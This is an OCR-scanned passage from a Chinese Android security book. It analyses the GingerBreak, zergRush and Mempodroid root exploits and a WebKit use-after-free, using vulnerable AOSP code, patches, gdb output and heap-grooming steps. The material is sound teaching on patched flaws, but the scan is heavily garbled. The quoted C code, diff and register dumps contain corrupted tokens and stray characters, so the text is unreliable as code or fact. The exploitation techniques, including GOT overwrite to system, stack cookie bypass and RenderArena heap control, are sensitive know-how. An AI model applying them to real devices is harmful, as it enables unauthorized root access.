殊 的 本 地 包 套 接 字 ， 内 核 空 间 与 用 户 空间 用 它 来 交换 数据 。 第 二 个 漏洞 则 出 在 UNIX 域 套 接 字 
( UNIX domain socket ) 上 。UNIX 域 套 接 字 都 与 文件 系统 的 特定 路 径 绑 定 ， 而 且 拥 有 自己 的 用 户 
和 组 ， 类似 于 普通 文件 的 属性 。 由 于 UNIX 域 套 接 字 并 没有 对 所 有 用 户 开 放 访 问 ， 因 此 即便 攻破 
了 浏览 器 进程 ， 也 不 能 以 此 来 进一步 对 UNIX 域 套 接 字 发 起 攻击 。 

第 三 个 利用 是 mempodroid， 它 利用 了 Linux 内 核 中 的 一 个 漏洞 ， 可 以 在 更 高 权限 的 进程 内 
存 中 写 人 数据 。 一 种 巧妙 利用 这 个 漏洞 的 方法 是 ， 让 一 个 set-uid 程序 执行 一 个 自 定义 的 载荷 ， 
从 而 提 权 。 尽 管 这 个 利用 依赖 于 内 核 的 漏洞 ， 但 是 基本 的 漏洞 利用 发 生 在 用 户 空 间 。 





| 
























































8.2.1 GingerBreak 


vold 守护 进程 不 断 监听 NETLINK 套 接 字 ， 等 待 新 磁盘 相关 事件 的 通知 消息 ， 来 实现 磁盘 
的 自动 挂 载 。 这 些 消息 一 般 由 内 核发 送 给 所 有 注册 了 特定 类 型 消息 的 用 户 态 程序 ， 但 是 用 户 态 
进程 也 有 可 能 发 送 NETLINK 消息 。 这 就 导致 攻击 者 可 以 伪造 用 户 程序 原本 预期 从 内 核发 送出 
来 的 消息 ， 暴 露出 了 一 种 攻击 面 。 还 需要 注意 的 是 ， 目 前 Android 权限 系统 并 没有 对 NETLINK 
套 接 字 进 行 限制 ， 任 何 程序 都 可 以 使 用 它 来 通讯 ， 因 此 所 有 接收 NETLINK 消息 的 程序 都 被 极 
大 地 拓宽 了 攻击 面 。 

vold 进程 使 用 了 Android 开源 项 目 (AOSP ) 库 中 的 代码 来 解析 和 处 理 NETLINK 消息 。 传递 
一 个 块 设备 事件 相关 的 消息 时 , 分 发 器 类 VolumeManager 会 调用 所 有 注册 了 volume 类 的 虚 函 
数 nandleBlockEvent。 每 一 个 注册 了 的 类 会 判断 这 个 消息 是 否 跟 自身 相关 。 下 面 的 代码 片段 
摘自 AOSP 中 的 system/vold/VolumeManager.cpp， 从 中 可 以 看 到 handleBlockEvent 的 实现 。 

vold 中 handleBlockEvent 的 实现 



















































































void VolumeManager: :handleBlockEvent (NetlinkEvent *evt) { 
const char *devpath = evt->findParam("DEVPATH"); 


/* Lookup a volume to handle this device */ 
VolumeCollection::iterator it; 
bool hit = false; 
for (it = mVolumes->begin(); it != mVolumes->end(); ++it) { 
if (!(*it)->handleBlockEvent (evt)) { 
#ifdef NETLINK_DEBUG 
SLOGD ("Device '%s' event handled by volume %s\n", devpath, 
(*it)->getLabel ()); 
#endif 
nit, = te 
break; 
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TE (CE 
#ifdef NETLINK_DEBUG 
SLOGW("No volumes handled block event for '%s'", devpath); 
#endif 
} 
} 








DirectVolume 类 包含 了 处 理 分 区 添加 的 代码 。 当 一 个 NETLINK 消息 的 参数 DEVTYPE 非 
disk 时 ， 这 上 段 代码 就 会 执行 。 下 面 的 代码 片段 摘自 AOSP 中 的 system/vold/DirectVolume. cpp， 





包含 了 DirectVolume 类 中 nangdlePartitionAdded 国 数 的 实现 。 
vold 中 未 修复 的 handlePartitionadded 函数 代码 ，commit8509494 


void DirectVolume: :handlePartitionAdded(const char *devpath, 
NetlinkEvent *evt) { 
int major = atoi(evt->findParam("MAJOR")); 
int minor = atoi(evt->findParam("MINOR")); 


int part_num; 





由 从 NETLINK 消息 中 获取 PARTN 参数 








const char *tmp = evt->findParam("PARTN"); 


if (tmp) { 
part_num = atoi (tmp); 
} else { 


SLOGW ("Kernel block uevent missing 'PARTN'"); 
part_num = 1; 





过 


| 检查 动态 增长 的 成 员 变 量 ， 但 是 并 没有 定义 绝对 数组 边界 





if (part_num > mDiskNumParts) { 
mDiskNumParts = part_num; 


} 


if (major != mDiskMajor) { 
SLOGE ("Partition '%s' has a different major than its disk!", 
devpath);} 
return; 





| 将 用 户 控制 的 值 存 入 用 户 控制 的 下 标 所 对 应 的 数组 元 素 中 ， 只 检查 了 上 界 
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if (Part_num > MAX_PARTITIONS) { 
SLOGE ("Dv:partAdd: ignoring part_ num = %d (max: %d)\n", 
part_num, MAX_ PARTITIONS); 
} else { 
mPartMinors[lpart_num -1] = minor; 
} 
pe 
} 


这 个 函数 没有 正确 地 检查 part_num 变量 的 边界 ， 攻 击 者 可 以 通过 NETLINK 消息 中 的 
PARTN 参数 来 传人 part_num 变量 的 值 。 在 上 述 比较 语句 中 , part_num 变量 被 解释 为 有 符号 整 
数 ， 并 且 被 用 作 数组 下 标 来 访问 整数 数组 。 函 数 没 有 检查 下 标 是 否 为 负数 ， 这 导致 了 程序 访问 
mPartMinors 数组 ( 位 于 堆 上 ) 之 前 的 元 素 。 

攻击 者 可 以 覆盖 数组 mPartMinors 内 存 之 前 任意 的 32 比特 字 为 任意 可 控 值 。 这 个 漏洞 在 
Android 2.3.4 中 得 到 了 修复 : 只 是 添加 了 负数 下 标 值 的 检查 。 下 面 代码 是 通过 git qiff 命令 得 
到 的 相关 修复 。 

handlePartitionAdded 函数 忽略 边界 检查 补丁 ，commitf3d3ce5 























--- a/DirectVolume.cpp 
+++ b/DirectVolume.cpp 
QQ -186,6 +186,11 @@ void DirectVolume::handlePartitionAdded 
(const char *devpath, NetlinkEvent *evt) 
part_num = 1; 





| 以 下 是 新 增 的 边界 检查 








if (part_ num > MAX_PARTITIONS || part num < 1) { 
SLOGW("Invalid 'PARTN' value"); 
Bart. im 三 13 


} 


+ + + + + 


if (Part_num > mDiskNumParts) { 
mDiskNumParts = part_num; 


} 
这 是 一 个 经 典 的 原 语 ， 被 称 为 “ 写 四 个 字 节 ”( write-four )。 这 个 原 语 描 述 的 场景 是 攻击 者 可 
以 控制 任意 地 址 的 32 比特 。Sebastian Krahmer 编写 的 公开 利用 并 不 需要 目标 进程 泄露 信息 ， 而 
是 使 用 了 Android 的 月 演 日 志 记 录 工 具 。 由 于 这 个 利用 用 于 root 自己 的 设备 , 所 以 假设 使 用 ADB 
shell 来 运行 ,从 而 可 以 读 取 系统 日 志 里 的 一 些 骨 省 信 息 ,， 如 第 7 章 所 述 。 善 通 应 用 程序 的 用 户 可 
能 不 在 log 组 中 ， 因 此 无 法 读 取 系统 日 志和 运行 利用 。 

GingerBreak 首先 需要 得 到 全 局 偏 移 表 (GOT ) 到 DirectVolume 类 mPartMinors 数组 的 
局 移 。 由 于 受 影 响 的 Android 版 本 还 未 引入 ASLR， 因 此 vold 进程 无 论 如 何 重启 ， 这 个 偏 移 都 会 
保持 不 变 ， 而 且 vold 月 淡 后 会 自动 重启 。 利 用 会 首先 使 用 无 效 的 偏 移 来 让 它 崩 演 ， 然 后 读 取 骨 
省 日 志 信 息 , 获取 地 址 信息 。 这样 GOT 距离 mPartMinor 数组 的 偏 移 就 可 以 很 容易 地 计算 出 来 。 
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GOT 的 地 址 可 以 通过 解析 磁盘 上 vold 的 ELF 可 执行 文件 头 来 得 到 。 这 些 方法 使 利用 无 需 进 一 步 
修改 就 可 以 在 不 同 编译 版 本 的 vold 上 工作 。 图 8-7 显示 了 如 何 使 用 负 的 数组 索引 来 覆盖 GOT。 


低地 址 
































‘text 


GOT 
.data | i 
heap ' 

高 地 二 : 


图 8-7 获取 GOT 表 到 堆 的 偏 移 


为 了 实现 有 效 代码 执行 ， 漏洞 利 用 把 GOT 表 中 的 strcmp 函数 项 覆盖 为 libc 中 的 system 
函数 。 同 样 ， 系 统 没 有 开启 ASLR， 所 以 也 可 以 使 用 当前 进程 libc 中 system 函数 的 地 址 ， 这 和 目 
标 进 程 中 的 system 地 址 是 相同 的 。 当 vold 进程 下 一 次 调用 strcmp 时 ,就 会 执行 system 函数 。 

利用 发 送 了 一 个 NETLINK 请 求 ， 请 求 包含 一 个 用 来 作 比 较 的 参数 字符 串 。 因 为 scrcmp 已 
经 被 指向 了 system， 所 以 利用 内需 在 传人 的 参数 字符 串 中 提供 一 个 二 进 制程 序 的 路 径 。 这 样 ， 
当 vold 对 字符 串 进 行 比较 时 ， 就 会 运行 这 个 二 进 制 程序 。 可 以 看 到 ， 无 需 使 用 原生 代码 的 载 
或 者 是 第 9 章 所 提 到 的 ROP 就 可 以 写 出 这 个 利用 ， 使 其 非常 优雅 且 不 依赖 于 目标 环境 。 在 漏洞 
利用 中 ， 简 单 往往 意味 着 可 靠 。 




















到 

















8.2.2 zergRush 


GingerBreak 利用 了 vold 代码 中 的 漏洞 ， 而 zergRush 则 利用 了 libsysutils 库 中 的 漏洞 。 
libsystutils 库 提 供 了 Framework 套 接 字 的 通用 接口 , 实际 上 就 是 传统 的 UNIX 域 套 接 字 。 程序 从 
套 接 字 收 到 的 消息 中 抽取 出 的 文本 命令 会 导致 栈 缓冲 区 溢出 。 这 个 漏洞 在 Android 4.0 中 得 到 了 
修复 。 它 的 攻击 面 非常 有 限 , 只 有 root 用 户 和 mount 用 户 组 可 以 访问 UNIX 域 套 接 字 , 如 下 所 示 。 

vold 框架 套 接 字 文 件 属 性 


# ls -1 /dev/socket/vold 
Srw-rw---- root mount 2013-02-21 16:08 vold 


本 地 的 ADB shell 以 用 户 shell 来 运行 ， 而 shell 用 户 在 mount 用 户 组 中 ， 因 此 可 以 通过 ADB 
shell 使 用 这 个 漏洞 来 root 设备 。 然而, 非 mount 组 的 其 他 用 户 是 无 法 访问 这 个 套 接 字 的 , 例如 浏 
览 器 。 当 然 ， 如 果 其 他 进程 也 使 用 了 包含 漏洞 的 FrameworkListener 代码 ， 就 可 以 利用 对 应 
的 套 接 字 漏 洞 并 获得 相应 的 权限 。 

包含 漏洞 的 函数 会 把 收 到 的 UNIX 域 套 接 字 消息 解析 成 不 同 的 ( 以 空格 划分 的 ) 参数 ,代码 
如 下 所 示 。 
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包含 漏洞 的 dispatchCommand 函数 


void FrameworkListener::dispatchCommand (SocketClient *cli, char *data) { 
FrameworkCommandCollection::iterator i; 
Tit arge SS "0 
char *argv[FrameworkListener: :CMD_ ARGS_ MAX]; 





| 在 栈 上 临时 分 配 一 个 局 部 缓冲 区 





char tmpl255]; 
char DS Vata 





| 将 指针 qd 指向 这 个 临时 缓冲 区 





wise 本 一 Em 

bool esc = false; 
bool quote = false; 
int k; 


memset (argv, 0, sizeof (argv)); 
memset (tmp, 0, sizeof (tmp)); 





| 下 面 的 循环 遍历 输入 中 的 所 有 字符 ， 直 到 遇 到 一 个 结尾 的 0 








while(*p) { 





| 将 用 户 和 输入 复制 到 缓冲 区 ， 参 数 放 入 数组 ， 但 是 没有 检查 边界 





*q = *p++; 
if (!quote && xd == ' ') { 
0 0 
argv[largc++] = strdup (tmp); 


memset (tmp, 0, sizeof (tmp)); 





| 如 果 引 用 的 字符 串 外 面 还 有 一 个 空格 ， 则 将 gq 重 置 到 tmp 的 起 始 位 置 





G = tmp; 
continue; 
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| 增加 目标 指针 ， 但 是 没有 检查 边界 。 





} 
argv[largc++] = strdup (tmp); 


for (] = 0; j < argc; j++) 
free(largv[j]); 
return; 


} 

这 个 漏洞 的 补丁 在 AOSP 当中 core 目录 的 commitc6b0def 中 引入 。 补丁 增加 了 一 个 新 的 局 部 
变量 qlimit 来 指向 tmp 的 结尾 。 在 向 gs 写 人 数据 之 前 ,开发 者 检查 了 a 是否 大 于 等 于 alimit。 

因为 返回 地 址 保存 在 栈 上 ， 所 以 漏洞 利用 非常 简单 ， 只 需要 覆盖 溢出 tmp 缓冲 区 直到 获 盖 
返回 地 址 ， 并 把 返回 地 址 指向 攻击 者 的 原生 代码 载荷 。 图 8-8 展示 了 这 个 简单 的 情形 。 









































argv[15] 


tmp[0..255] 


栈 cookie 全 a 
保存 的 程序 计数 器 











图 8-8 覆盖 tmp 缓冲 区 ， 返 回 地 址 的 栈 缓冲 区 溢出 


由 于 程序 中 启用 了 栈 cookie 保护 , 所 以 需要 更 复杂 的 利用 技巧 。 在 先前 的 漏洞 代码 片段 中 可 
以 看 到 ,程序 也 没有 检查 argv 数组 的 边界 zergRush 利用 使 用 16 个 空 的 元 素来 增加 argc 变量 ， 
让 argv 数组 越界 到 与 tmp 缓冲 区 重合 的 位 置 。 接 下 来 ， 利 用 往 tmp 写 和 人 一些 稍 后 会 被 程序 释 
放 的 指针 ， 这样 就 可 以 人 为 地 产生 堆 上 释放 后 重用 的 情形 。 利 用 释放 后 重用 和 虚 消 数 表 指 针 ， 利 
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用 就 可 以 劫持 控制 流 。 滋 出 后 的 栈 帧 如 图 8-9 所 示 。 


hk----------------------1 





























argv[15] 












argv[16] 


tmp[0..255] 














保存 的 程序 计数 器 


图 8-9 覆盖 tmp 缓冲 区 ， 保 留 cookie 的 栈 数组 溢出 

由 于 Android 2.3 系列 引入 了 XN 保护 机 制 , 不 允许 攻击 者 直接 执行 任意 代码 , zergRush 利用 
使 用 了 一 个 非常 简单 的 ROP 链 来 为 system 设置 参数 。 利 用 这 个 技术 ， 利 用 就 可 以 用 root 权限 
运行 任意 二 进 制程 序 (与 GingerBreak 利用 一 样 )。 第 9 章 会 详细 介绍 ROP 技术 。 






































8.2.3 Mempodroid 


Linux 内 核 2.6.39 到 3.0 版 本 中 包含 一 个 漏洞 ， 可 以 让 用 户 在 某 种 限制 下 写 入 其 他 进程 的 内 
存 。 这 个 漏洞 在 2012 年 1 月 份 被 披露 ，Android 4.0 使 用 了 这 个 版 本 的 Linux 内 核 ， 所 以 也 受到 
了 影响 。 

Linux 通过 一 个 特殊 的 字符 设备 /proc/$pigd/mem 把 每 个 进程 的 虚拟 内 存 暴露 为 一 个 文件 。 
出 于 安全 考虑 ， 读 写 这 个 文件 的 权限 被 严格 限制 ， 拥 有 写 入 权限 的 只 有 内 存 的 所 属 进程 。 感 谢 
UNIX “万物 即 文件 ”的 设计 哲学 , 攻击 者 可 以 打开 目标 进程 的 mem 设备 , 把 它 复制 到 进程 的 stdout 
和 stderr。 要 利用 这 个 漏洞 ， 还 需要 绕 过 一 些 检 查 。Jason A.Donenfeld 在 博客 中 进行 了 详细 说 明 : 
http://blog.zx2c4.com/749。 

当 stdout 重 定向 到 与 虚拟 内 存 相关 的 字符 设备 时 ， 攻 击 者 可 以 写 人 其 他 程序 内 存 ， 但 是 写 
和 人 人 地址 是 未 知 的 。 事 实 上， 只 要 在 程序 运行 之 前 seek 字符 设备 , 攻击 者 就 可 以 控制 写 人 数据 的 
地 址 。 
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Jay Freeman 编写 的 利用 针对 run-as 这 个 二 进 制程 序 ， 这 个 程序 类 似 于 传统 Linux 平台 上 的 
sudo， 用 来 以 其 他 用 户 的 身份 运行 程序 。 要 实现 这 个 功能 ，run-as 程序 必须 属于 root 用 户 ， 而 且 
设置 了 set-uid 权限 比特 位 。 

explioit 首先 提供 写 和 人 目标 内 存 的 载荷 ， 即 要 执行 命令 的 用 户 名 。run-as 没有 查 到 该 用 户 ， 于 
是 会 向 stderr 打印 错误 消息 。 利 用 通过 seek mem 设备 来 设 定 要 写 人 的 目标 地 址 。 该 地 址 为 一 个 
错误 处 理 函 数 路 径 ， 会 调用 exit 函数 来 终止 程序 。 所 以 ， 这 一 错误 的 实际 退出 代码 可 以 被 替换 
成 攻击 者 控制 的 代码 。 为 了 尽 可 能 减少 替换 的 代码 ， 利 用 精心 选择 了 调用 sxit 函数 的 调用 点 ， 
并 把 这 个 代码 换 成 了 setresuid(0)。 这 样 ， 函 数 返回 时 相当 于 没有 错误 发 生 ，run-as 就 会 正常 
运行 攻击 者 提供 的 命令 。 







































































D7FC ;MOV RO, R4 MOV RO, R4 

D7FE :BLX exitgroup- POP {RO, R1,R4 ~ R6 

D802 :NOP MOVS R5, #0 
rod - MOVW R3, #0XAD57 
1 D808 1 BX R3 


ps 


10XAD56 







MOV RO, RS 
MOV R1, R5 
MOV R2, RS 


BL wrap_setresuid32| 





图 8-10 原 代 码 和 替换 代码 


这 又 是 一 个 非常 优雅 、 简 洁 的 利用 , 反应 了 对 目标 程序 的 理解 。 它 充分 利用 了 程序 的 已 有 功 
运行 攻击 者 想 要 运行 的 程序 。 
































8.3 Android 浏览 器 漏洞 利用 


本 章 介 绍 WebKit 泻 染 代码 中 的 一 个 释放 后 重用 漏洞 ， 作 为 高 级 堆 漏 洞 利 用 技术 的 案例 。 这 
个 漏洞 是 CVE-2011-3068, 已 经 在 WebKit 的 commit100677 中 修复 。 修 复 时 引用 了 bug#70456， 
但 是 这 个 bug 在 本 书 编写 时 还 是 关闭 状态 。 在 Android 4.0.4 版 本 (标签 为 android-4.0.4-aah-r1l 
和 android-4.0.4_r1 ) 的 commitd911316 和 538b01d 中 ， 这 个 漏洞 的 修补 被 合并 到 Android 
浏览 器 的 WebKit 引擎 中 , 修补 来 自 于 对 上 游 的 commit 进行 cherry-pick。 漏 洞 利用 在 搭载 Android 
4.0.1 (buildITL41F ) 的 Galaxy Nexus 上 接受 了 测试 ， 该 系统 版 本 已 经 被 证 实 存在 漏洞 。 
8.3.1 理解 漏洞 

官方 补丁 并 没有 很 好 地 解释 漏洞 ， 而 且 理 解 WebKit 源 代 码 是 一 个 很 高 的 屏障 。 不 过 对 于 攻 
击 者 来 说 ， 修 补 的 commit 中 包含 一 个 崩溃 测试 样 例 用 于 回归 测试 ， 同 时 也 使 得 利用 开发 变 得 更 
容易 ! 使 用 调试 器 附加 到 浏览 器 进程 ( 如何 配 置 调试 环境 见 第 7 章 )， 设 置 好 正确 的 符号 后 运行 
测试 样 例 ， 浏 览 器 会 月 演 ， 如 下 所 示 。 
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运行 commit100677 中 的 测试 样 例 后 的 崩溃 信息 


Program received signal SIGSEGV, Segmentation fault. 
[Switching to Thread 2050] 
0x00000000 in ?? () 





| 查看 所 有 寄存 器 





gdb > 工 工 

EQ 0x6157a8 0x6157a8 

EL 0x0 0x0 

E22 0x80000000 0x80000000 
EE3 0x0 0x0 

r4 0x6157a8 0x6157a8 

共生 0x615348 0x615348 

r6 0x514b78 0x5141b78 

gh Oxl1 Oxl1 

r8 Ox5ba40540 0x5pa40540 
r9 Ox5ba40548 0x5pa40548 
EQ 0xa5 0xa5 

oa Ox615424 0X615424 

a O03 “0x3 

sp Ox5ba40538 0x5ba40538 
开交 0x59e8ca55 0x59e8ca55 
Be 0x0 0 

cpsr 0x10 0x10 





| 反 汇 编 调用 函数 








gdb > disas $1r 
Dump of assembler code for function 
_ZN7WebCorel2RenderObject1l4layoutIfNeededEv: 
0x59e8ca40 <+0>: push {r4, lr} 
0x59e8ca42 <+2>: mov r4, r0 
0x59e8ca44 <+4>: bl 0x59e41b904 
<_ZNK7WebCorel2RenderObjectllneedsLayoutEv> 
0x59e8ca48 <+8>: cpbz r0, 0x59e8ca54 
_ZN7WebCorel2RenderObjectl4layoutIfNeededEv+20> 





| 把 虚 函 数 表 指针 加 载 到 工 0 





0x59e8ca4a <+10>: ldr r0, [r4, #0] 





| 把 虚 函 数 指针 加 载 到 r3 ( 将 会 发 生 0 地 址 跳 转 ， 导 致 前 溃 ) 





Ox59e8ca4c <+12>: ldr.w r3, [r0, #380] pal0 >, Mk 
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| 把 this 指针 加 载 到 r0 





0x59e8ca50 <+16>: mov r0, r4 





| 调用 虚 函 数 





0x59e8ca52 <+18>: blx r3 
0x59e8ca54 <+20>: pop {r4, pc} 
End of assembler dump. 





| 查看 虚 函 数 表 指针 和 调用 点 的 this 指针 





gdb > x/1lwx $r0 
0x6157a8: 0x00615904 





| 打印 虚 函 数 地 址 





gdb > x/lwx (*$r0 + 0x17c) 
0x615a80: 0x00000000 




















调用 点 是 一 个 非常 通用 的 1ayout 也 数 ,在 所 有 Renderobject 的 子 类 中 都 有 定义 , 如 下 所 示 : 


RenderObject.h 中 的 layoutIfNeeded 


/* This function performs a layout only if one is needed. */ 


void layoutIfNeeded() { if (needsLayout()) 


layout (); } 


很 明显 ， 这 是 一 个 RenderArena 的 释放 后 重用 漏洞 。 正 如 8.1.2 节 中 所 述 ， 虚 函数 表 指 针 
被 改写 。 源 代码 审计 人 员 也 许 会 去 更 好 地 理解 这 个 漏洞 , 但 是 对 于 漏洞 利用 这 一 目标 来 说 ,理解 
到 这 个 程度 已 经 足够 。 遗 憾 的 是 ， 这 个 漏洞 不 允许 攻击 者 在 触发 释放 后 重新 获得 JavaScript 的 控 
制 ， 这 就 使 得 代码 分 析 失 去 了 意义 。 为 了 利用 这 个 漏洞 ， 必 须 控 制 虚 函 数 表 的 内 容 , 但 是 目前 虚 
函数 表 指 针 指 向 了 男 一 个 无 法 控制 的 Renderobject 实例 。 








8.3.2 ”控制 堆 











现在 , 堆 上 的 虚 函 数 表 已 经 被 解 引 用 ， 下 面 必 须 控制 相应 的 推 内存 区 域 来 影响 代码 执行 。 由 
于 虚 函 数 的 调用 紧 接 在 内 存 块 释放 之 后 , 所 以 不 可 能 在 原 地 分 配 任意 Renderobject。 即便 攻击 
者 可 以 在 释放 后 再 次 执行 JavaScript 代码 , 也 必须 构造 另 一 个 大 小 为 0x7c 的 RenderObject。 只 
有 原本 的 RenderBlock 类 是 特定 大 小 ,所 以 攻击 的 可 能 性 十 分 有 限 。 使 虚 函 数 表 指针 指向 一 个 











空闲 的 块 更 有 可 能 取得 成 功 。 








空闲 块 组 成 的 单 向 链表 中 包含 大 小 相同 的 内 存 块 。 正 如 前 面 所 说 , 不 可 能 在 列表 中 放 和 人 其 他 
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类 的 示例 ; 但 是 ,在 虚 函 数 表 中 解 引用 的 偏 移 0x17c 比 整 个 实例 的 0x7c 还 要 大 。 因 此 实际 查 到 
的 虚 函 数 指针 会 越过 对 象 ， 进 入 RenderArena 中 或 后 面 。 这 就 为 控制 虚 函 数 表 指针 打开 了 思路 。 

1. 使 用 CSS 

第 一 种 可 能 的 方法 是 , 从 未 分 配 的 空间 分 配 一 个 新 的 Renderobject, 紧 接 在 要 被 释放 的 内 
存 块 之 后 。 通 过 控制 这 个 新 的 分 配 ， 可 以 控制 虚 函 数 指针 偏 移 处 的 数据 。 要 确保 这 个 新 的 分 配 来 
自 新 的 、 未 分 配 的 空间 ， 可 以 通过 填充 现存 的 空 闪 内存 块 “ 洞 ”来 实现 。 这 种 方法 实现 的 堆 布 局 如 
图 8-6 所 示 。 

不 幸 的 是 , Renderobject 子 类 也 都 非常 小 , 因此 使 用 这 些 对 象 控制 数据 非常 困难 。 这 些 对 
象 中 大 多 数 的 32 位 整数 来 自 于 CSS 解析 器 得 到 的 CSS 值 , 例如 位 置 和 边 距 。CSS 代码 使 用 4 比 
特 整 数 来 存储 额外 的 标志 ， 例 如 数值 是 否 表示 一 个 百分比 。 这 就 使 得 CSS 值 只 有 28 比特 ， 最 高 
的 4 比特 被 置 0。 幸 运 的 是 ， 还 有 一 些 例外 。 其 中 一 个 是 RenderListItem, 即 DOM 中 1i 市 
点 在 泻 染 树 中 的 等 价 对 象 。 这 种 列表 项 有 一 个 绝对 的 位 置信 息 , 例如 一 个 带 有 特殊 值 或 显示 偏 移 
的 编号 列表 。 这 些 32 比特 值 会 被 原封 不 动 地 复制 到 RenderListItem 的 成 员 变 量 m_value 和 
m_explicitvalue 中 。 这 样 ， 只 要 在 RenderListItem 前 再 填充 一 个 空白 的 RenderBlock 
示例 ， 就 能 得 出 精确 的 虚 函 数 偏 移 。 

使 用 gdb 检查 类 大 小 


gdb > p 2 * sizeof('WebCore::RenderBlock') 
+ (uint32 七 ) &(('WebCore::RenderListItem' *) 0)->m value 
$1 三 Ox17C 


这 样 ， 程 序 计数 器 (pc ) 的 整个 32 比特 都 可 以 被 控制 。 带 有 填充 的 空白 对 象 的 堆 内 存 布 局 
如 图 8-11 所 示 。 

































































TOX17c 

















a 
下 个 空闲 志 RenderBlock! RenderBlock | :时 ， 
虑 函数 表 指 人 ' 颖 ， 
1 ES 
da | ， We 
UaF-RenderBlock RenderListltem 








图 8-11 包含 填充 和 RenderListItem 的 RenderArena 布局 


在 没有 XN 保护 的 老 版 本 Android 系统 中 ， 基 于 RenderListItem 的 技术 非常 有 用 。 在 这 
种 场景 下 , 攻击 者 控制 了 *3 , 但 并 没有 控制 r3 指向 的 附近 内 存 或 者 其 他 寄存 器 指向 的 内 存 。 第 
9 章 会 介绍 如 何 使 用 ROP 来 绕 过 XN 保护 。 在 这 种 情况 下 , 攻击 者 可 能 需要 控制 更 多 的 内 存 来 进 
行 栈 迁 移 (stack pivot )。 

2. 使 用 空闲 内 存 块 

要 控制 RenderArena 中 已 分 配 内 存 块 之 后 的 内 存 ， 另 一 种 方法 是 确保 相应 内 存 区 域 从 未 被 分 
配 ， 保 持 未 初始 化 状态 。 使 用 这 种 方法 ， 虚 函数 指针 就 会 从 未 初始 化 的 内 存 中 读 取 。 前 面 说 过 ， 
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arena 通过 主 堆 来 分 配 。 如 果 攻 击 者 可 以 从 主 堆 分 配 一 个 RenderArena 大 小 的 内 存 块 , 把 内 容 设置 
成 想 要 控制 的 值 并 释放 该 内 存 块 , 那么 下 一 个 RenderArena 的 分 配 就 会 被 初始 化 成 攻击 者 所 控制 
的 值 。 

要 在 dimalloc 堆 上 保留 一 个 空闲 内 存 块 , 必须 注意 以 下 事项 。 攻击 者 必须 确保 被 释放 的 内 存 
块 不 会 被 其 他 相 邻 内 存 块 合并 ， 而 且 在 下 一 个 RenderArena 分 配 之 前 ， 其 他 的 内 存 分 配 有 足够 的 
空闲 块 。 综 合 考虑 这 些 因 素 ， 有 以 下 步骤 。 

(1) 创建 足够 多 与 RenderArena 相同 大 小 的 内 存 块 ， 并 且 将 其 内 容 都 填充 为 想 要 的 值 。 每 一 
次 分 配 时 ， 都 紧 接 着 分 配 一 小 块 内 存 作为 守护 ， 防 止 内 存 块 合并 。 

(2) 释放 所 有 与 RenderArena 相同 大 小 的 内 存 块 ， 但 不 释放 守护 内 存 块 。 守 护 内 存 块 会 防止 
假 的 arena 合并 ， 这样 arena 就 可 以 用 来 分 配 真 正 的 RenderArena。 

(3) 创建 足够 多 的 Renderobject 示例 ， 用 完 当 前 的 RenderArena ， 从 而 确保 新 分 配 的 
RenderArena 来自 上 面 准备 的 内 存 块 。 

(4) 创建 一 个 与 受 释 放 后 重用 漏洞 影响 的 Renderobject 类 型 相同 的 对 象 ， 本 例 中 是 
RenderBlock。 确保 它 是 当前 RenderArena 中 最 后 分 配 的 Render 对 象 , 并 且 恰 好 在 受 释 放 后 重 
用 漏洞 影响 的 Renderobject 之 前 释放 。 

完成 这 些 步 又 之 后 ， 堆 的 布局 应 该 如 图 8-12 所 示 。 

























































































伪造 的 Arena (已 释放 ， 可 控 内 容 ) 


守护 内 存 块 (已 分 配 ) 


伪造 的 Arena 
dlmalloc 


内 存 块 守护 内 存 块 











伪造 的 庶 函 


Arena 头 部 | Render* Render* UaF 数 指针 表 未 分 配 内 存 ， 但 可 控 





























[= 下 
下 一 个 空闲 块 ” 函数 指针 偏 移 
图 8-12 构造 后 的 RenderArena 和 dlmalloc 状态 


3. 使 用 已 分 配 的 内 存 块 

除了 之 前 提 到 的 方法 ,攻击 者 还 可 以 在 RenderArena 后 面 放置 一 个 已 分 配 的 dimalloc 内 存 块 。 
这 种 技术 特别 有 用 ， 因 为 在 堆 的 分 配 释放 和 触发 漏洞 过 程 中 ,已 分 配 的 内 存 块 不 太 可 能 被 修改 。 
与 上 一 种 方法 类 似 ， 虚 函数 表 指 针 会 指向 RenderArena 的 结尾 。 当 虚 函 数 被 调用 时 ， 程 序 会 读 取 
加 上 偏 移 后 地 址 的 数值 来 作为 函数 指针 ， 此 处 的 数值 可 以 被 攻击 者 控制 。 

攻击 者 控制 了 PC 寄存 器 以 及 足够 的 内 存 来 进行 栈 迁 移 和 ROP ,距离 完全 控制 程序 又 近 了 一 步 。 
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8.4 小 结 


本 章 讨 论 了 ARM 平 台 上 用 户 空 间 的 一 系列 内 存 破坏 漏洞 利用 技术 ， 详 细 介 绍 了 栈 和 堆 内 存 
相关 的 实现 细节 和 利用 技术 。 尽 管 讨论 的 内 容 没有 履 盖 所 有 可 能 出 现 的 漏洞 类 型 或 利用 技术 , 但 
是 为 漏洞 利用 开发 提供 了 思路 。 

基于 堆 的 内 存 破坏 攻击 与 应 用 本 身 以 及 分 配器 十 分 相关 , 是 目前 最 常见 的 漏洞 类 型 。 释放 后 
重用 漏洞 可 以 让 攻击 者 使 用 新 分 配 内 存 块 来 重用 已 经 释放 的 内 存 块 ,相当 于 引入 了 别名 引用 bug。 
我 们 以 Android 的 原生 分 配器 dimalloc 和 WebKit 特定 分 配器 RenderArena 为 例 ,讨论 了 这 种 情形 。 
虚 函 数 表 为 堆 破 坏 漏 洞 提供 了 一 种 劫持 原生 代码 执行 流 的 方式 。 
通过 考察 一 些 已 经 公开 的 真实 漏洞 利用 , 可 以 发 现 简单 的 思路 能 让 利用 更 稳定 , 并 降低 开发 
成 本 。GingerBreak 利用 展示 了 如 何 利 用 数组 下 标 漏洞 来 修改 GOT。zergRush 利用 是 Android 系 
统 上 栈 破 坏 利用 以 及 绕 过 栈 cookie 保护 的 一 个 突出 例子 。Mempodroid 则 展示 了 一 种 非 传统 的 技 
术 ， 利 用 内 核 漏洞 获得 权限 提升 。 

最 后 ， 本 章 介 绍 了 几 种 思路 ， 用 来 利用 Webkit 泻 染 引擎 中 公开 且 已 修复 的 释放 后 重用 漏洞 ， 
解释 了 编写 JavaScript 来 控制 堆 的 关键 步骤。 了 解 本 章 介绍 的 技术 之 后 ， 就 可 以 继续 学 习 第 9 章 
中 的 构造 栈 迁 移 和 ROP 链 了 。 
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本 章 主要 介绍 ROP ( Return Oriented Programming ) 漏洞 利用 技术 基础 ， 并 解释 使 用 这 种 技 
